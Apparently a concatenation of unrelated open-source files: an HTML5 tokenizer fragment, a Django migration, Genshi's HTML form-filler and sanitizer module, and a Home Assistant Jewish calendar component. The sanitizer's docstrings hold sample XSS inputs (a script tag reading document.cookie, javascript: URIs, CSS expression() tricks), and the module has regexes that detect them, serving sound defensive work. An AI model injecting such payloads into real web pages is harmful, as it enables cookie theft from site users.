False self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["name"] = "\uFFFD" self.state = self.doctypeNameState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-doctype-name-but-got-eof"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.currentToken["name"] = data self.state = self.doctypeNameState return True def doctypeNameState(self): data = self.stream.char() if data in spaceCharacters: self.currentToken["name"] = self.currentToken["name"].translate(asciiUpper2Lower) self.state = self.afterDoctypeNameState elif data == ">": self.currentToken["name"] = self.currentToken["name"].translate(asciiUpper2Lower) self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["name"] += "\uFFFD" self.state = self.doctypeNameState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-doctype-name"}) self.currentToken["correct"] = False self.currentToken["name"] = self.currentToken["name"].translate(asciiUpper2Lower) self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.currentToken["name"] += data return True def afterDoctypeNameState(self): data = self.stream.char() if data in spaceCharacters: pass elif data == ">": self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data is EOF: self.currentToken["correct"] = False self.stream.unget(data) self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-doctype"}) self.tokenQueue.append(self.currentToken) self.state = self.dataState else: if data in ("p", "P"): matched = True for expected in (("u", "U"), ("b", "B"), ("l", "L"), ("i", "I"), ("c", "C")): data = self.stream.char() if data not in expected: matched = False break if matched: self.state = self.afterDoctypePublicKeywordState return True elif data in ("s", "S"): matched = True for expected in (("y", "Y"), ("s", "S"), ("t", "T"), ("e", "E"), ("m", "M")): data = self.stream.char() if data not in expected: matched = False break if matched: self.state = self.afterDoctypeSystemKeywordState return True # All the characters read before the current 'data' will be # [a-zA-Z], so they're garbage in the bogus doctype and can be # discarded; only the latest character might be '>' or EOF # and needs to be ungetted self.stream.unget(data) self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "expected-space-or-right-bracket-in-doctype", "datavars": {"data": data}}) self.currentToken["correct"] = False self.state = self.bogusDoctypeState return True def afterDoctypePublicKeywordState(self): data = self.stream.char() if data in spaceCharacters: self.state = self.beforeDoctypePublicIdentifierState elif data in ("'", '"'): self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-char-in-doctype"}) self.stream.unget(data) self.state = self.beforeDoctypePublicIdentifierState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.stream.unget(data) self.state = self.beforeDoctypePublicIdentifierState return True def beforeDoctypePublicIdentifierState(self): data = self.stream.char() if data in spaceCharacters: pass elif data == "\"": self.currentToken["publicId"] = "" self.state = self.doctypePublicIdentifierDoubleQuotedState elif data == "'": self.currentToken["publicId"] = "" self.state = self.doctypePublicIdentifierSingleQuotedState elif data == ">": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-end-of-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-char-in-doctype"}) self.currentToken["correct"] = False self.state = self.bogusDoctypeState return True def doctypePublicIdentifierDoubleQuotedState(self): data = self.stream.char() if data == "\"": self.state = self.afterDoctypePublicIdentifierState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["publicId"] += "\uFFFD" elif data == ">": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-end-of-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.currentToken["publicId"] += data return True def doctypePublicIdentifierSingleQuotedState(self): data = self.stream.char() if data == "'": self.state = self.afterDoctypePublicIdentifierState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["publicId"] += "\uFFFD" elif data == ">": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-end-of-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.currentToken["publicId"] += data return True def afterDoctypePublicIdentifierState(self): data = self.stream.char() if data in spaceCharacters: self.state = self.betweenDoctypePublicAndSystemIdentifiersState elif data == ">": self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data == '"': self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-char-in-doctype"}) self.currentToken["systemId"] = "" self.state = self.doctypeSystemIdentifierDoubleQuotedState elif data == "'": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-char-in-doctype"}) self.currentToken["systemId"] = "" self.state = self.doctypeSystemIdentifierSingleQuotedState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-char-in-doctype"}) self.currentToken["correct"] = False self.state = self.bogusDoctypeState return True def betweenDoctypePublicAndSystemIdentifiersState(self): data = self.stream.char() if data in spaceCharacters: pass elif data == ">": self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data == '"': self.currentToken["systemId"] = "" self.state = self.doctypeSystemIdentifierDoubleQuotedState elif data == "'": self.currentToken["systemId"] = "" self.state = self.doctypeSystemIdentifierSingleQuotedState elif data == EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-char-in-doctype"}) self.currentToken["correct"] = False self.state = self.bogusDoctypeState return True def afterDoctypeSystemKeywordState(self): data = self.stream.char() if data in spaceCharacters: self.state = self.beforeDoctypeSystemIdentifierState elif data in ("'", '"'): self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-char-in-doctype"}) self.stream.unget(data) self.state = self.beforeDoctypeSystemIdentifierState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.stream.unget(data) self.state = self.beforeDoctypeSystemIdentifierState return True def beforeDoctypeSystemIdentifierState(self): data = self.stream.char() if data in spaceCharacters: pass elif data == "\"": self.currentToken["systemId"] = "" self.state = self.doctypeSystemIdentifierDoubleQuotedState elif data == "'": self.currentToken["systemId"] = "" self.state = self.doctypeSystemIdentifierSingleQuotedState elif data == ">": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-char-in-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-char-in-doctype"}) self.currentToken["correct"] = False self.state = self.bogusDoctypeState return True def doctypeSystemIdentifierDoubleQuotedState(self): data = self.stream.char() if data == "\"": self.state = self.afterDoctypeSystemIdentifierState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["systemId"] += "\uFFFD" elif data == ">": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-end-of-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.currentToken["systemId"] += data return True def doctypeSystemIdentifierSingleQuotedState(self): data = self.stream.char() if data == "'": self.state = self.afterDoctypeSystemIdentifierState elif data == "\u0000": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) self.currentToken["systemId"] += "\uFFFD" elif data == ">": self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-end-of-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.currentToken["systemId"] += data return True def afterDoctypeSystemIdentifierState(self): data = self.stream.char() if data in spaceCharacters: pass elif data == ">": self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data is EOF: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "eof-in-doctype"}) self.currentToken["correct"] = False self.tokenQueue.append(self.currentToken) self.state = self.dataState else: self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "unexpected-char-in-doctype"}) self.state = self.bogusDoctypeState return True def bogusDoctypeState(self): data = self.stream.char() if data == ">": self.tokenQueue.append(self.currentToken) self.state = self.dataState elif data is EOF: # XXX EMIT self.stream.unget(data) self.tokenQueue.append(self.currentToken) self.state = self.dataState else: pass return True def cdataSectionState(self): data = [] while True: data.append(self.stream.charsUntil("]")) data.append(self.stream.charsUntil(">")) char = self.stream.char() if char == EOF: break else: assert char == ">" if data[-1][-2:] == "]]": data[-1] = data[-1][:-2] break else: data.append(char) data = "".join(data) # Deal with null here rather than in the parser nullCount = data.count("\u0000") if nullCount > 0: for i in range(nullCount): self.tokenQueue.append({"type": tokenTypes["ParseError"], "data": "invalid-codepoint"}) data = data.replace("\u0000", "\uFFFD") if data: self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data}) self.state = self.dataState return True
mit
ECastleton/Popstop
popsicle/orders/migrations/0007_auto_20170425_2210.py
1
1295
# -*- coding: utf-8 -*- # Generated by Django 1.10.6 on 2017-04-26 04:10 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('orders', '0006_auto_20170424_2037'), ] operations = [ migrations.AlterModelOptions( name='flavor', options={'ordering': ['flavor_name']}, ), migrations.AlterModelOptions( name='productcategory', options={'ordering': ['category_name'], 'verbose_name': 'Category', 'verbose_name_plural': 'Categories'}, ), migrations.RemoveField( model_name='productcategory', name='flavors', ), migrations.AddField( model_name='flavor', name='category', field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.CASCADE, to='orders.ProductCategory'), ), migrations.AlterField( model_name='cateringmenu', name='end_date', field=models.DateField(), ), migrations.AlterField( model_name='cateringmenu', name='start_date', field=models.DateField(), ), ]
gpl-3.0
OpenClovis/SAFplus-Availability-Scalability-Platform
src/ide/genshi/genshi/filters/html.py
22
22797
# -*- coding: utf-8 -*- # # Copyright (C) 2006-2009 Edgewall Software # All rights reserved. # # This software is licensed as described in the file COPYING, which # you should have received as part of this distribution. The terms # are also available at http://genshi.edgewall.org/wiki/License. # # This software consists of voluntary contributions made by many # individuals. For the exact contribution history, see the revision # history and logs, available at http://genshi.edgewall.org/log/. """Implementation of a number of stream filters.""" try: any except NameError: from genshi.util import any import re from genshi.core import Attrs, QName, stripentities from genshi.core import END, START, TEXT, COMMENT __all__ = ['HTMLFormFiller', 'HTMLSanitizer'] __docformat__ = 'restructuredtext en' class HTMLFormFiller(object): """A stream filter that can populate HTML forms from a dictionary of values. >>> from genshi.input import HTML >>> html = HTML('''<form> ... <p><input type="text" name="foo" /></p> ... </form>''', encoding='utf-8') >>> filler = HTMLFormFiller(data={'foo': 'bar'}) >>> print(html | filler) <form> <p><input type="text" name="foo" value="bar"/></p> </form> """ # TODO: only select the first radio button, and the first select option # (if not in a multiple-select) # TODO: only apply to elements in the XHTML namespace (or no namespace)? def __init__(self, name=None, id=None, data=None, passwords=False): """Create the filter. :param name: The name of the form that should be populated. If this parameter is given, only forms where the ``name`` attribute value matches the parameter are processed. :param id: The ID of the form that should be populated. If this parameter is given, only forms where the ``id`` attribute value matches the parameter are processed. :param data: The dictionary of form values, where the keys are the names of the form fields, and the values are the values to fill in. :param passwords: Whether password input fields should be populated. This is off by default for security reasons (for example, a password may end up in the browser cache) :note: Changed in 0.5.2: added the `passwords` option """ self.name = name self.id = id if data is None: data = {} self.data = data self.passwords = passwords def __call__(self, stream): """Apply the filter to the given stream. :param stream: the markup event stream to filter """ in_form = in_select = in_option = in_textarea = False select_value = option_value = textarea_value = None option_start = None option_text = [] no_option_value = False for kind, data, pos in stream: if kind is START: tag, attrs = data tagname = tag.localname if tagname == 'form' and ( self.name and attrs.get('name') == self.name or self.id and attrs.get('id') == self.id or not (self.id or self.name)): in_form = True elif in_form: if tagname == 'input': type = attrs.get('type', '').lower() if type in ('checkbox', 'radio'): name = attrs.get('name') if name and name in self.data: value = self.data[name] declval = attrs.get('value') checked = False if isinstance(value, (list, tuple)): if declval is not None: checked = declval in [unicode(v) for v in value] else: checked = any(value) else: if declval is not None: checked = declval == unicode(value) elif type == 'checkbox': checked = bool(value) if checked: attrs |= [(QName('checked'), 'checked')] elif 'checked' in attrs: attrs -= 'checked' elif type in ('', 'hidden', 'text') \ or type == 'password' and self.passwords: name = attrs.get('name') if name and name in self.data: value = self.data[name] if isinstance(value, (list, tuple)): value = value[0] if value is not None: attrs |= [ (QName('value'), unicode(value)) ] elif tagname == 'select': name = attrs.get('name') if name in self.data: select_value = self.data[name] in_select = True elif tagname == 'textarea': name = attrs.get('name') if name in self.data: textarea_value = self.data.get(name) if isinstance(textarea_value, (list, tuple)): textarea_value = textarea_value[0] in_textarea = True elif in_select and tagname == 'option': option_start = kind, data, pos option_value = attrs.get('value') if option_value is None: no_option_value = True option_value = '' in_option = True continue yield kind, (tag, attrs), pos elif in_form and kind is TEXT: if in_select and in_option: if no_option_value: option_value += data option_text.append((kind, data, pos)) continue elif in_textarea: continue yield kind, data, pos elif in_form and kind is END: tagname = data.localname if tagname == 'form': in_form = False elif tagname == 'select': in_select = False select_value = None elif in_select and tagname == 'option': if isinstance(select_value, (tuple, list)): selected = option_value in [unicode(v) for v in select_value] else: selected = option_value == unicode(select_value) okind, (tag, attrs), opos = option_start if selected: attrs |= [(QName('selected'), 'selected')] elif 'selected' in attrs: attrs -= 'selected' yield okind, (tag, attrs), opos if option_text: for event in option_text: yield event in_option = False no_option_value = False option_start = option_value = None option_text = [] elif in_textarea and tagname == 'textarea': if textarea_value: yield TEXT, unicode(textarea_value), pos textarea_value = None in_textarea = False yield kind, data, pos else: yield kind, data, pos class HTMLSanitizer(object): """A filter that removes potentially dangerous HTML tags and attributes from the stream. >>> from genshi import HTML >>> html = HTML('<div><script>alert(document.cookie)</script></div>', encoding='utf-8') >>> print(html | HTMLSanitizer()) <div/> The default set of safe tags and attributes can be modified when the filter is instantiated. For example, to allow inline ``style`` attributes, the following instantation would work: >>> html = HTML('<div style="background: #000"></div>', encoding='utf-8') >>> sanitizer = HTMLSanitizer(safe_attrs=HTMLSanitizer.SAFE_ATTRS | set(['style'])) >>> print(html | sanitizer) <div style="background: #000"/> Note that even in this case, the filter *does* attempt to remove dangerous constructs from style attributes: >>> html = HTML('<div style="background: url(javascript:void); color: #000"></div>', encoding='utf-8') >>> print(html | sanitizer) <div style="color: #000"/> This handles HTML entities, unicode escapes in CSS and Javascript text, as well as a lot of other things. However, the style tag is still excluded by default because it is very hard for such sanitizing to be completely safe, especially considering how much error recovery current web browsers perform. It also does some basic filtering of CSS properties that may be used for typical phishing attacks. For more sophisticated filtering, this class provides a couple of hooks that can be overridden in sub-classes. :warn: Note that this special processing of CSS is currently only applied to style attributes, **not** style elements. """ SAFE_TAGS = frozenset(['a', 'abbr', 'acronym', 'address', 'area', 'b', 'big', 'blockquote', 'br', 'button', 'caption', 'center', 'cite', 'code', 'col', 'colgroup', 'dd', 'del', 'dfn', 'dir', 'div', 'dl', 'dt', 'em', 'fieldset', 'font', 'form', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'hr', 'i', 'img', 'input', 'ins', 'kbd', 'label', 'legend', 'li', 'map', 'menu', 'ol', 'optgroup', 'option', 'p', 'pre', 'q', 's', 'samp', 'select', 'small', 'span', 'strike', 'strong', 'sub', 'sup', 'table', 'tbody', 'td', 'textarea', 'tfoot', 'th', 'thead', 'tr', 'tt', 'u', 'ul', 'var']) SAFE_ATTRS = frozenset(['abbr', 'accept', 'accept-charset', 'accesskey', 'action', 'align', 'alt', 'axis', 'bgcolor', 'border', 'cellpadding', 'cellspacing', 'char', 'charoff', 'charset', 'checked', 'cite', 'class', 'clear', 'cols', 'colspan', 'color', 'compact', 'coords', 'datetime', 'dir', 'disabled', 'enctype', 'for', 'frame', 'headers', 'height', 'href', 'hreflang', 'hspace', 'id', 'ismap', 'label', 'lang', 'longdesc', 'maxlength', 'media', 'method', 'multiple', 'name', 'nohref', 'noshade', 'nowrap', 'prompt', 'readonly', 'rel', 'rev', 'rows', 'rowspan', 'rules', 'scope', 'selected', 'shape', 'size', 'span', 'src', 'start', 'summary', 'tabindex', 'target', 'title', 'type', 'usemap', 'valign', 'value', 'vspace', 'width']) SAFE_CSS = frozenset([ # CSS 3 properties <http://www.w3.org/TR/CSS/#properties> 'background', 'background-attachment', 'background-color', 'background-image', 'background-position', 'background-repeat', 'border', 'border-bottom', 'border-bottom-color', 'border-bottom-style', 'border-bottom-width', 'border-collapse', 'border-color', 'border-left', 'border-left-color', 'border-left-style', 'border-left-width', 'border-right', 'border-right-color', 'border-right-style', 'border-right-width', 'border-spacing', 'border-style', 'border-top', 'border-top-color', 'border-top-style', 'border-top-width', 'border-width', 'bottom', 'caption-side', 'clear', 'clip', 'color', 'content', 'counter-increment', 'counter-reset', 'cursor', 'direction', 'display', 'empty-cells', 'float', 'font', 'font-family', 'font-size', 'font-style', 'font-variant', 'font-weight', 'height', 'left', 'letter-spacing', 'line-height', 'list-style', 'list-style-image', 'list-style-position', 'list-style-type', 'margin', 'margin-bottom', 'margin-left', 'margin-right', 'margin-top', 'max-height', 'max-width', 'min-height', 'min-width', 'opacity', 'orphans', 'outline', 'outline-color', 'outline-style', 'outline-width', 'overflow', 'padding', 'padding-bottom', 'padding-left', 'padding-right', 'padding-top', 'page-break-after', 'page-break-before', 'page-break-inside', 'quotes', 'right', 'table-layout', 'text-align', 'text-decoration', 'text-indent', 'text-transform', 'top', 'unicode-bidi', 'vertical-align', 'visibility', 'white-space', 'widows', 'width', 'word-spacing', 'z-index', ]) SAFE_SCHEMES = frozenset(['file', 'ftp', 'http', 'https', 'mailto', None]) URI_ATTRS = frozenset(['action', 'background', 'dynsrc', 'href', 'lowsrc', 'src']) def __init__(self, safe_tags=SAFE_TAGS, safe_attrs=SAFE_ATTRS, safe_schemes=SAFE_SCHEMES, uri_attrs=URI_ATTRS, safe_css=SAFE_CSS): """Create the sanitizer. The exact set of allowed elements and attributes can be configured. :param safe_tags: a set of tag names that are considered safe :param safe_attrs: a set of attribute names that are considered safe :param safe_schemes: a set of URI schemes that are considered safe :param uri_attrs: a set of names of attributes that contain URIs """ self.safe_tags = safe_tags # The set of tag names that are considered safe. self.safe_attrs = safe_attrs # The set of attribute names that are considered safe. self.safe_css = safe_css # The set of CSS properties that are considered safe. self.uri_attrs = uri_attrs # The set of names of attributes that may contain URIs. self.safe_schemes = safe_schemes # The set of URI schemes that are considered safe. # IE6 <http://heideri.ch/jso/#80> _EXPRESSION_SEARCH = re.compile(u""" [eE \uFF25 # FULLWIDTH LATIN CAPITAL LETTER E \uFF45 # FULLWIDTH LATIN SMALL LETTER E ] [xX \uFF38 # FULLWIDTH LATIN CAPITAL LETTER X \uFF58 # FULLWIDTH LATIN SMALL LETTER X ] [pP \uFF30 # FULLWIDTH LATIN CAPITAL LETTER P \uFF50 # FULLWIDTH LATIN SMALL LETTER P ] [rR \u0280 # LATIN LETTER SMALL CAPITAL R \uFF32 # FULLWIDTH LATIN CAPITAL LETTER R \uFF52 # FULLWIDTH LATIN SMALL LETTER R ] [eE \uFF25 # FULLWIDTH LATIN CAPITAL LETTER E \uFF45 # FULLWIDTH LATIN SMALL LETTER E ] [sS \uFF33 # FULLWIDTH LATIN CAPITAL LETTER S \uFF53 # FULLWIDTH LATIN SMALL LETTER S ]{2} [iI \u026A # LATIN LETTER SMALL CAPITAL I \uFF29 # FULLWIDTH LATIN CAPITAL LETTER I \uFF49 # FULLWIDTH LATIN SMALL LETTER I ] [oO \uFF2F # FULLWIDTH LATIN CAPITAL LETTER O \uFF4F # FULLWIDTH LATIN SMALL LETTER O ] [nN \u0274 # LATIN LETTER SMALL CAPITAL N \uFF2E # FULLWIDTH LATIN CAPITAL LETTER N \uFF4E # FULLWIDTH LATIN SMALL LETTER N ] """, re.VERBOSE).search # IE6 <http://openmya.hacker.jp/hasegawa/security/expression.txt> # 7) Particular bit of Unicode characters _URL_FINDITER = re.compile( u'[Uu][Rr\u0280][Ll\u029F]\s*\(([^)]+)').finditer def __call__(self, stream): """Apply the filter to the given stream. :param stream: the markup event stream to filter """ waiting_for = None for kind, data, pos in stream: if kind is START: if waiting_for: continue tag, attrs = data if not self.is_safe_elem(tag, attrs): waiting_for = tag continue new_attrs = [] for attr, value in attrs: value = stripentities(value) if attr not in self.safe_attrs: continue elif attr in self.uri_attrs: # Don't allow URI schemes such as "javascript:" if not self.is_safe_uri(value): continue elif attr == 'style': # Remove dangerous CSS declarations from inline styles decls = self.sanitize_css(value) if not decls: continue value = '; '.join(decls) new_attrs.append((attr, value)) yield kind, (tag, Attrs(new_attrs)), pos elif kind is END: tag = data if waiting_for: if waiting_for == tag: waiting_for = None else: yield kind, data, pos elif kind is not COMMENT: if not waiting_for: yield kind, data, pos def is_safe_css(self, propname, value): """Determine whether the given css property declaration is to be considered safe for inclusion in the output. :param propname: the CSS property name :param value: the value of the property :return: whether the property value should be considered safe :rtype: bool :since: version 0.6 """ if propname not in self.safe_css: return False if propname.startswith('margin') and '-' in value: # Negative margins can be used for phishing return False return True def is_safe_elem(self, tag, attrs): """Determine whether the given element should be considered safe for inclusion in the output. :param tag: the tag name of the element :type tag: QName :param attrs: the element attributes :type attrs: Attrs :return: whether the element should be considered safe :rtype: bool :since: version 0.6 """ if tag not in self.safe_tags: return False if tag.localname == 'input': input_type = attrs.get('type', '').lower() if input_type == 'password': return False return True def is_safe_uri(self, uri): """Determine whether the given URI is to be considered safe for inclusion in the output. The default implementation checks whether the scheme of the URI is in the set of allowed URIs (`safe_schemes`). >>> sanitizer = HTMLSanitizer() >>> sanitizer.is_safe_uri('http://example.org/') True >>> sanitizer.is_safe_uri('javascript:alert(document.cookie)') False :param uri: the URI to check :return: `True` if the URI can be considered safe, `False` otherwise :rtype: `bool` :since: version 0.4.3 """ if '#' in uri: uri = uri.split('#', 1)[0] # Strip out the fragment identifier if ':' not in uri: return True # This is a relative URI chars = [char for char in uri.split(':', 1)[0] if char.isalnum()] return ''.join(chars).lower() in self.safe_schemes def sanitize_css(self, text): """Remove potentially dangerous property declarations from CSS code. In particular, properties using the CSS ``url()`` function with a scheme that is not considered safe are removed: >>> sanitizer = HTMLSanitizer() >>> sanitizer.sanitize_css(u''' ... background: url(javascript:alert("foo")); ... color: #000; ... ''') [u'color: #000'] Also, the proprietary Internet Explorer function ``expression()`` is always stripped: >>> sanitizer.sanitize_css(u''' ... background: #fff; ... color: #000; ... width: e/**/xpression(alert("foo")); ... ''') [u'background: #fff', u'color: #000'] :param text: the CSS text; this is expected to be `unicode` and to not contain any character or numeric references :return: a list of declarations that are considered safe :rtype: `list` :since: version 0.4.3 """ decls = [] text = self._strip_css_comments(self._replace_unicode_escapes(text)) for decl in text.split(';'): decl = decl.strip() if not decl: continue try: propname, value = decl.split(':', 1) except ValueError: continue if not self.is_safe_css(propname.strip().lower(), value.strip()): continue is_evil = False if self._EXPRESSION_SEARCH(value): is_evil = True for match in self._URL_FINDITER(value): if not self.is_safe_uri(match.group(1)): is_evil = True break if not is_evil: decls.append(decl.strip()) return decls _NORMALIZE_NEWLINES = re.compile(r'\r\n').sub _UNICODE_ESCAPE = re.compile( r"""\\([0-9a-fA-F]{1,6})\s?|\\([^\r\n\f0-9a-fA-F'"{};:()#*])""", re.UNICODE).sub def _replace_unicode_escapes(self, text): def _repl(match): t = match.group(1) if t: return unichr(int(t, 16)) t = match.group(2) if t == '\\': return r'\\' else: return t return self._UNICODE_ESCAPE(_repl, self._NORMALIZE_NEWLINES('\n', text)) _CSS_COMMENTS = re.compile(r'/\*.*?\*/').sub def _strip_css_comments(self, text): return self._CSS_COMMENTS('', text)
gpl-2.0
pschmitt/home-assistant
homeassistant/components/jewish_calendar/__init__.py
7
4146
"""The jewish_calendar component.""" import logging import hdate import voluptuous as vol from homeassistant.const import CONF_LATITUDE, CONF_LONGITUDE, CONF_NAME import homeassistant.helpers.config_validation as cv from homeassistant.helpers.discovery import async_load_platform _LOGGER = logging.getLogger(__name__) DOMAIN = "jewish_calendar" SENSOR_TYPES = { "binary": { "issur_melacha_in_effect": ["Issur Melacha in Effect", "mdi:power-plug-off"] }, "data": { "date": ["Date", "mdi:judaism"], "weekly_portion": ["Parshat Hashavua", "mdi:book-open-variant"], "holiday": ["Holiday", "mdi:calendar-star"], "omer_count": ["Day of the Omer", "mdi:counter"], "daf_yomi": ["Daf Yomi", "mdi:book-open-variant"], }, "time": { "first_light": ["Alot Hashachar", "mdi:weather-sunset-up"], "talit": ["Talit and Tefillin", "mdi:calendar-clock"], "gra_end_shma": ['Latest time for Shma Gr"a', "mdi:calendar-clock"], "mga_end_shma": ['Latest time for Shma MG"A', "mdi:calendar-clock"], "gra_end_tfila": ['Latest time for Tefilla MG"A', "mdi:calendar-clock"], "mga_end_tfila": ['Latest time for Tefilla Gr"a', "mdi:calendar-clock"], "big_mincha": ["Mincha Gedola", "mdi:calendar-clock"], "small_mincha": ["Mincha Ketana", "mdi:calendar-clock"], "plag_mincha": ["Plag Hamincha", "mdi:weather-sunset-down"], "sunset": ["Shkia", "mdi:weather-sunset"], "first_stars": ["T'set Hakochavim", "mdi:weather-night"], "upcoming_shabbat_candle_lighting": [ "Upcoming Shabbat Candle Lighting", "mdi:candle", ], "upcoming_shabbat_havdalah": ["Upcoming Shabbat Havdalah", "mdi:weather-night"], "upcoming_candle_lighting": ["Upcoming Candle Lighting", "mdi:candle"], "upcoming_havdalah": ["Upcoming Havdalah", "mdi:weather-night"], }, } CONF_DIASPORA = "diaspora" CONF_LANGUAGE = "language" CONF_CANDLE_LIGHT_MINUTES = "candle_lighting_minutes_before_sunset" CONF_HAVDALAH_OFFSET_MINUTES = "havdalah_minutes_after_sunset" CANDLE_LIGHT_DEFAULT = 18 DEFAULT_NAME = "Jewish Calendar" CONFIG_SCHEMA = vol.Schema( { DOMAIN: vol.Schema( { vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string, vol.Optional(CONF_DIASPORA, default=False): cv.boolean, vol.Inclusive(CONF_LATITUDE, "coordinates"): cv.latitude, vol.Inclusive(CONF_LONGITUDE, "coordinates"): cv.longitude, vol.Optional(CONF_LANGUAGE, default="english"): vol.In( ["hebrew", "english"] ), vol.Optional( CONF_CANDLE_LIGHT_MINUTES, default=CANDLE_LIGHT_DEFAULT ): int, # Default of 0 means use 8.5 degrees / 'three_stars' time. vol.Optional(CONF_HAVDALAH_OFFSET_MINUTES, default=0): int, } ) }, extra=vol.ALLOW_EXTRA, ) async def async_setup(hass, config): """Set up the Jewish Calendar component.""" name = config[DOMAIN][CONF_NAME] language = config[DOMAIN][CONF_LANGUAGE] latitude = config[DOMAIN].get(CONF_LATITUDE, hass.config.latitude) longitude = config[DOMAIN].get(CONF_LONGITUDE, hass.config.longitude) diaspora = config[DOMAIN][CONF_DIASPORA] candle_lighting_offset = config[DOMAIN][CONF_CANDLE_LIGHT_MINUTES] havdalah_offset = config[DOMAIN][CONF_HAVDALAH_OFFSET_MINUTES] location = hdate.Location( latitude=latitude, longitude=longitude, timezone=hass.config.time_zone, diaspora=diaspora, ) hass.data[DOMAIN] = { "location": location, "name": name, "language": language, "candle_lighting_offset": candle_lighting_offset, "havdalah_offset": havdalah_offset, "diaspora": diaspora, } hass.async_create_task(async_load_platform(hass, "sensor", DOMAIN, {}, config)) hass.async_create_task( async_load_platform(hass, "binary_sensor", DOMAIN, {}, config) ) return True
apache-2.0
imply/chuu
tools/find_runtime_symbols/prepare_symbol_info.py
24
8217
